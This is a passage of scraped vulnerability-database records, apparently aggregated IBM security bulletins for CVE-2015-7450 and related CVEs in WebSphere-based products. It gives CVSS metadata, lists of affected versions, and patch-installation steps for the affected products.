<https://www.ibm.com/support/knowledgecenter/SSEQTP_8.0.0/com.ibm.websphere.installation.base.doc/info/aes/ae/tins_install_fixes_dist_cl.html?lang=en> Follow the advice in this link wherever the IBM Installation Manager is mentioned in the rest of these procedures. \n**Detailed steps to perform the upgrade:** \n \n1) Stop the Liberty server that runs on the Applications server. \n\na) Log on to the Applications server as `root`. 
\nb) Enter the commands: \n`cd /opt/ibm/ioc51install/sample` \n`./maint.sh` \nc) Under the title **\"Control an IOC single-server instance\"**, select **\"4b) Stop Liberty <_server_>\"**. \n2) Log on to the Applications server as `root` by using the Gnome desktop or the KDE desktop. \n \n3) **_Either perform the update using a GUI:_**\n\nUpdate the components on the Applications server, including Liberty: \na) Start the Installation Manager through the GUI: **Applications -> IBM Applications Installation Manager** \nb) Select **Update**. \nc) Select **Next** repeatedly until you are prompted for an IBM ID and password. \nd) If you are prompted to perform an update to a new version of Installation Manager, click **Yes** to perform the upgrade and then click **OK** to restart the Installation Manager when prompted. \ne) If you upgraded the Installation Manager, select **Update** again. \nf) On the \"Configuration for IBM WebSphere Application Server Liberty Network Deployment 8.5.5.7\" panel, select **\"Launch Asset Selection Wizard\"**. \ng) Select **\"Update all packages with recommended updates and recommended fixes\"**. \nh) Enter your IBM ID and password. \ni) Accept the terms of the license agreement, and click **Finish**. \nj) On the \"Update Packages\" screen, in the Package Group Name column, select \"IBM WebSphere Application Server Network Deployment V8.0\" and click **Next**. \n**_Do not select \"IBM SPSS Collaboration and Deployment Services 7.0\", and do not select \"Update all packages with recommended updates and recommended fixes\". IOC is incompatible with the upgrade to SPSS._** \nk) Select all available fixes for \"WebSphere Application Server Network Deployment\". You must apply the Apache Commons fix `8.0.0.0-WS-WAS-IFPI52103`. \n**Note: This fix might not appear initially. 
You might have to apply earlier fixes to WebSphere Application Server to see this fix.** \nIf necessary, re-run IBM Installation Manager, select **\"Update Packages for IBM WebSphere Application Server Network Deployment V8.0\"** and then select **\"All available fixes for WebSphere Application Server Network Deployment\"**. \nApply all outstanding WebSphere Application Server updates. \nWhen you have applied all the WebSphere Application Server fixes, proceed to the next step. \n**_Or perform the update using a command line:_**\n\na) Download the `8.5.5.7-WS-WLP-DistOnly-IFPI52103.zip` file to a local system. \nb) Upload the compressed file to the `/tmp` file system on the Application Server. \nc) Log on to a terminal session as the `root` user. \nd) Execute these two commands to perform the installation: \n`cd /opt/IBM/InstallationManager/eclipse/tools` \n`./imcl install 8.5.5.7-WS-WLP-DistOnly-IFPI52103 -installationDirectory /opt/IBM/WebSphere/wlp -repositories /tmp/8.5.5.7-ws-wlp-distonly-ifpi52103.zip` \nThese commands install `8.5.5.7-WS-WLP-DistOnly-IFPI52103_8.5.5007.20151114_2058` to the `/opt/IBM/WebSphere/wlp` directory. 
\ne) To validate the installation, run the command: `./imcl listInstalledPackages -long` \n4) Start the Liberty server with the commands: \n\n`cd /opt/ibm/ioc51install/sample` \n`./maint.sh` \n5) Under the title **\"Control an IOC single-server instance\"**, select **\"4a) Start Liberty <_server_>\"**.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-19T21:04:31", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons in\u00a0IBM WebSphere Application Server affects Intelligent Operations Center and related products\u00a0(CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3566", "CVE-2015-7450"], "modified": "2022-08-19T21:04:31", "id": "63DAED287E5E589CB66DEE42D6AD62CBADA57BF5A22C757E4A6252674CC1D266", "href": "https://www.ibm.com/support/pages/node/272121", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:52:15", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Tivoli Storage Productivity 
Center and IBM Spectrum Control.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Spectrum Control 5.2.9 \nTivoli Storage Productivity Center 5.2.0 through 5.2.7 \nTivoli Storage Productivity Center 5.1.0 through 5.1.1.9 \n \nTivoli Storage Productivity Center 4.x and 3.x are not affected. \nIBM Spectrum Control 5.2.8 is not affected. \n \n**\\* Important:** Although IBM Spectrum Control 5.2.8 is not affected by this vulnerability, if you have applied version 5.2.9, the vulnerability has been re-introduced and must be remediated.\n\n## Remediation/Fixes\n\nThe solution is to apply an appropriate IBM Spectrum Control or Tivoli Storage Productivity Center fix maintenance for each named product and execute the manual steps listed below. \n \nIf you cannot upgrade to a fixed level of IBM Spectrum Control or Tivoli Storage Productivity Center, you can follow a procedure to apply an IBM WebSphere Application Server interim fix to your existing server as a mitigation noted here. 
\n\n**Note:** It is always recommended to have a current backup before applying any update procedure.\n\n \n \n**_IBM Spectrum Control 5.2.x and Tivoli Storage Productivity Center V5.2.x_** \n \n**Affected Version**| **APAR**| **Fixed Version**| **Availability** \n---|---|---|--- \n5.2.0 - 5.2.7| IT14418| 5.2.8 \\*| December 2015 \n5.2.9 \\*| IT15009| 5.2.10| May 2016 \n \n**\\* Important:** This vulnerability is not resolved in IBM Spectrum Control 5.2.9, even if you previously applied IBM Spectrum Control 5.2.8. \n \nApply fix maintenance as soon as practicable. (See [_Latest Downloads_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>)) \n\n \n \n**_Tivoli Storage Productivity Center V5.1.x_** \n \n**Affected Version**| **APAR**| **Fixed Version**| **Availability** \n---|---|---|--- \n5.1.x| IT14418| 5.1.1.10 (manual update steps are required in addition to applying 5.1.1.10; see the steps below this table)| April 2016 \n \nApply fix maintenance as soon as practicable. (See [_Latest Downloads_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>)) \n \nThese manual steps are required in addition to applying the V5.1.1.10 fixpack. \n \nTivoli Storage Productivity Center 5.1.x embeds Tivoli Integrated Portal 2.2, which embeds WebSphere Application Server 7.0 and requires the corresponding fix below. Follow these steps to apply the fix: \n\n1\\. Download WebSphere iFix PI52103 for WAS 7.0.0.0 (7.0.0.0-WS-WAS-IFPI52103) \n<http://www-01.ibm.com/support/docview.wss?uid=swg24041257> \n \n2\\. 
Apply the WebSphere Application Server 7.0 iFix PI52103 to Tivoli Integrated Portal using the preinstalled WAS Update Installer. \n \n_On Windows, the default location for WAS Update Installer is:_ \n`[TPC_Install_Location]\\IBM\\tipv2\\WebSphereUpdateInstallerV7\\` \n \n**Reference:** [Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2015-7450) (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21971089>)\n\n## Workarounds and Mitigations\n\n \nApplying IBM WebSphere Application Server interim fix PI52103 is an alternate option to mitigate the vulnerability if you cannot move up to a fixed level as noted in the table above. For more information, review the WebSphere Application Server security bulletin: <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n**Note:** Prior to applying the WebSphere Application Server interim fix, ensure Tivoli Storage Productivity Center is at the latest maintenance level -- 5.1.1.9, 5.2.7 or 5.2.9. If you later upgrade to a version of Tivoli Storage Productivity Center that does not contain a fix, you will need to perform this mitigation again. (See [_Latest Downloads_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>)) \n\n**Note:** It is always recommended to have a current backup before applying any update procedure.\n\n**Procedure for mitigation of IBM Spectrum Control 5.2.9 and Tivoli Storage Productivity Center 5.2.x and 5.1.1.x:**\n\n1\\. Download WebSphere iFix PI52103 for WebSphere Application Server 8.0.0.0 (8.0.0.0-WS-WAS-IFPI52103) from this location: [http://www.ibm.com/support/docview.wss?uid=swg24041257](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)\n\n2\\. If IBM Installation Manager is not yet installed on the IBM Spectrum Control or Tivoli Storage Productivity Center server system, download and install IBM Installation Manager. 
It is recommended to use the latest version -- currently 1.8.3, available here: [_http://www.ibm.com/support/docview.wss?uid=swg24039631_](<http://www-01.ibm.com/support/docview.wss?uid=swg24039631>)\n\n3\\. Launch IBM Installation Manager from the command line, specifying the IMData directory. The following is an example for Windows: \n\n`IBMIM.exe -dataLocation <TPC_dir>\\IMData` \n\nwhere `TPC_dir` might be `\\Program Files\\IBM\\TPC`\n\n \n4\\. From the IBM Installation Manager UI: \n\n \na. Select 'File' -> 'Preferences' \n\nb. Click on 'Add repository'\n\nc. Select the directory containing the WAS iFix. Press 'OK'\n\nd. Choose the 'Update' icon\n\ne. Select WAS iFix PI52103 and press 'Next'\n\nf. Verify the pre-installation summary is correct and select 'Update'\n\n \n \n**Additional procedure for mitigation of Tivoli Integrated Portal used by Tivoli Storage Productivity Center 5.1.1.x only:** \n \nTivoli Storage Productivity Center 5.1.x embeds Tivoli Integrated Portal 2.2, which embeds WebSphere Application Server 7.0 and requires the corresponding fix below. Follow these steps to apply the fix: \n \n1\\. Download WebSphere iFix PI52103 for WAS 7.0.0.0 (7.0.0.0-WS-WAS-IFPI52103) \n[http://www.ibm.com/support/docview.wss?uid=swg24041257](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>) \n \n2\\. 
Apply the WebSphere Application Server 7.0 iFix PI52103 to Tivoli Integrated Portal using the preinstalled WAS Update Installer. \n \n_On Windows, the default location for WAS Update Installer is:_ \n`[TPC_Install_Location]\\IBM\\tipv2\\WebSphereUpdateInstallerV7\\` \n \n**Reference:** [Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2015-7450) (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971089>)\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T19:27:34", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Tivoli Storage Productivity Center and IBM Spectrum Control (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2022-02-22T19:27:34", "id": "1696E1D8792540E46785AF5C86F8AD0F77D5F716A56F15223E99344280FB380A", "href": "https://www.ibm.com/support/pages/node/273075", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:36:58", "description": "## Summary\n\nThere are 
multiple vulnerabilities in IBM WebSphere Application Server bundled with IBM Jazz Team Server based Applications that affect the following products: Collaborative Lifecycle Management (CLM), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rational Team Concert (RTC), Rational Quality Manager (RQM), Rational Rhapsody Design Manager (Rhapsody DM) and IBM Rhapsody Model Manager.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-3603](<https://vulners.com/cve/CVE-2014-3603>) \n**DESCRIPTION:** The (1) HttpResource and (2) FileBackedHttpResource implementations in Shibboleth Identity Provider (IdP) before 2.4.1 and OpenSAML Java 2.6.2 do not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. 
\nCVSS Base Score: 6.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/164271> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n**CVEID:** [CVE-2019-12402](<https://vulners.com/cve/CVE-2019-12402>) \n**DESCRIPTION:** The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165956> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 6.0 - 6.0.6.1 \n \nRational Quality Manager 6.0 - 6.0.6.1 \nRational Team Concert 6.0 - 6.0.6.1 \nRational DOORS Next Generation 6.0 - 6.0.6.1 \nRational Engineering Lifecycle Manager 6.0 - 6.0.6.1 \nRational Rhapsody Design Manager 6.0 - 6.0.6.1\n\nIBM Rhapsody Model Manager 6.0.5 - 6.0.6.1\n\n## Remediation/Fixes\n\nThe IBM Jazz Team Server based Applications bundle different versions of IBM WebSphere Application Server with the available versions of the products, and in addition to the bundled version some previous versions of WAS are also supported. 
Information about multiple security vulnerabilities affecting WAS has been published.\n\nFor CLM applications version 6.0 to 6.0.6.1 review the Security Bulletins below to determine if your WAS version is affected and the required remediation:\n\n[Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>)\n\n[Security Bulletin: Man in the middle vulnerability in WebSphere Application Server Liberty (CVE-2014-3603)](<https://www.ibm.com/support/pages/security-bulletin-man-middle-vulnerability-websphere-application-server-liberty-cve-2014-3603>)\n\n[Security Bulletin: Denial of service vulnerability in WebSphere Application Server Liberty (CVE-2019-12402)](<https://www.ibm.com/support/pages/node/1074156>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-04T16:06:07", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities affect multiple IBM Rational products based on IBM Jazz technology", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3603", 
"CVE-2015-7450", "CVE-2019-12402"], "modified": "2020-08-04T16:06:07", "id": "C08849A00434A559EE1C5504DAE1CDDB28E9D46EDC400E95B2136AC317DFE7A3", "href": "https://www.ibm.com/support/pages/node/1110393", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:40", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Business Process Manager.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Business Process Manager V8.5.0.0 - V8.5.6.0\n\n## Remediation/Fixes\n\nInstall IBM Business Process Manager interim fix JR54748 as appropriate for your current IBM Business Process Manager version. 
\n\n\n * [_IBM Business Process Manager Advanced_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=aparId&apars=JR54748>)\n * [IBM Business Process Manager Standard](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=aparId&apars=JR54748>)\n * [IBM Business Process Manager Express](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=aparId&apars=JR54748>)\n * Note that the vulnerable open source library was also included in IBM WebSphere Application Server (WAS) that is shipped with IBM Business Process Manager (all versions and editions). Refer to the following Security bulletin for details about required WAS updates in your BPM environment: [Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21970332>)\n\n## Workarounds and Mitigations\n\nnone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:21", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Business Process Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2018-06-15T07:04:21", "id": "2CB6FCE1D8C2AE7870229728405D7DB0319A218C7C0F82CAE5330252E65018ED", "href": "https://www.ibm.com/support/pages/node/273367", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:41", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Business Process Manager and WebSphere Lombardi Edition. Information about security vulnerabilities affecting WebSphere Application Server has been published in security bulletins.\n\n## Vulnerability Details\n\nPlease consult the security bulletins \n\n * [Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21966837>)\n * [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server October 2015 CPU (CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21969620>)\n * [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>)\nfor vulnerability details and information about fixes. 
\n\n## Affected Products and Versions\n\n * IBM Business Process Manager V7.5.x through V8.5.6.0\n * WebSphere Lombardi Edition V7.2.0.x\n \n \n_For earlier unsupported versions of the products, IBM recommends upgrading to a fixed, supported version of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:03:52", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2018-06-15T07:03:52", "id": "85C7B2A7E45DEAC491FFA9036DDD7B660F687C1176A08D3E4CE2EE121DB8C2FA", "href": "https://www.ibm.com/support/pages/node/270855", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:40", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere 
Process Server. Information about security vulnerabilities affecting WebSphere Application Server has been published in security bulletins.\n\n## Vulnerability Details\n\nPlease consult the security bulletins \n\n * [Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21966837>)\n * [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server October 2015 CPU (CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21969620>)\n * [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>)\n \nfor vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n * WebSphere Process Server 7.0.x\n * WebSphere Process Server Hypervisor Editions V7.0\n\n \nGeneral support for WebSphere Process Server ended 2015-04-30. Hypervisor editions were in support until 2015-09-30. 
You are strongly advised to upgrade to a supported product such as IBM Business Process Manager Advanced Edition.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T18:47:15", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with WebSphere Process Server (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2022-09-15T18:47:15", "id": "2AA98F262EB695D2458A3ED4EC4F0E7090EB4CE4B2F0F815EF828CF974F2C44B", "href": "https://www.ibm.com/support/pages/node/270853", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:52", "description": "## Summary\n\nFixes of Cognos Business Intelligence is provided as part of Tivoli Common Reporting (TCR) fixes. 
\n \nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 6 and IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 7 that are used by IBM Cognos Business Intelligence. These issues were disclosed as part of the IBM Java SDK updates in October 2015. \n \nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Cognos Business Intelligence. \n \nAdd/remove users to/from an external (namespace) group could leave them with old permissions. \n \nBackURL prefixed with white-space skips CAF validation. \n \nA security vulnerability has been discovered in the Open Source Apache HttpComponents. \n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2015-7436_](<https://vulners.com/cve/CVE-2015-7436>)** \nDESCRIPTION:** Add/remove users to/from an external (namespace) group could leave them with old permissions. \nCVSS Base Score: 2.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107961_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107961>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n**CVEID: **[_CVE-2015-7435_](<https://vulners.com/cve/CVE-2015-7435>)** \nDESCRIPTION:** BackURL prefixed with white-space skips CAF validation. 
\nCVSS Base Score: 3.7 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107960_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107960>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n** \nCVEID: **[_CVE-2012-6153_](<https://vulners.com/cve/CVE-2012-6153>)** \nDESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by an incomplete fix related to the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/95328>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n**CVEID: **[_CVE-2014-3577_](<https://vulners.com/cve/CVE-2014-3577>)** \nDESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this 